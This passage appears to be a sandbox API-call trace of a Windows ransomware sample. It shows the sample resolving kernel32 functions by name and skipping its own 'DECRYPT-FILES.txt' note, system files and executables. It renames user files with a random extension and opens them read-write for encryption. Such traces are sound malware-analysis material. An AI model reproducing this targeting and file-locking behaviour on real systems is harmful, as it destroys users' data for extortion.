lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.001] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.001] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.001] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.001] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.001] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.001] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.001] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.001] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.001] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.001] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.001] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.002] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.002] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.002] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.002] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.002] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.002] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.002] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.002] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.002] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.002] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.002] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.002] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.002] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.002] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.002] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.002] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.002] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.002] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.002] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.003] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.003] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.003] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.003] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.003] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.003] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.003] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.003] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.003] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.003] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.003] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.003] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.003] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.003] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.003] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.003] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.003] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.003] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.003] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.004] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.004] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.004] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.004] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.004] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.004] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.004] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.004] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.004] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.004] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.004] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.004] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.004] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.004] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.004] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.004] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.004] lstrlenA (lpString="DELETEATOM") returned 10 [0085.004] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.004] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.005] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.005] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.005] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.005] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.005] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.005] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.005] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.005] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.005] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.005] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.005] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.005] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.005] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.005] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.005] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.005] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.005] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.005] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.005] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.006] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.006] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.006] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.006] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.006] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.006] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.006] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.006] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.006] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.006] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.006] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.006] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.006] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.006] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.006] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.006] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.006] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.006] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.006] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.007] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.007] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.007] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.007] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.007] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.007] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 65 [0085.007] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.XOScwQd") returned 73 [0085.007] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.XOScwQd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.xoscwqd"), dwFlags=0x0) returned 1 [0085.008] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.008] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.008] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.008] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0085.008] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.008] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="autorun.inf") returned 1 [0085.008] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="boot.ini") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="desktop.ini") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="ntuser.dat") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="iconcache.db") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="bootsect.bak") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="ntuser.dat.log") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="thumbs.db") returned 1 [0085.009] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Bootfont.bin") returned 1 [0085.009] lstrlenW (lpString="Web Slice Gallery.url") returned 21 [0085.009] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.009] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.009] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.009] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.009] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0085.009] lstrlenW (lpString="Web Slice Gallery.url") returned 21 [0085.009] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0085.009] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Web Slice Gallery.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" [0085.009] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.010] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=226) returned 1 [0085.010] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.010] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, 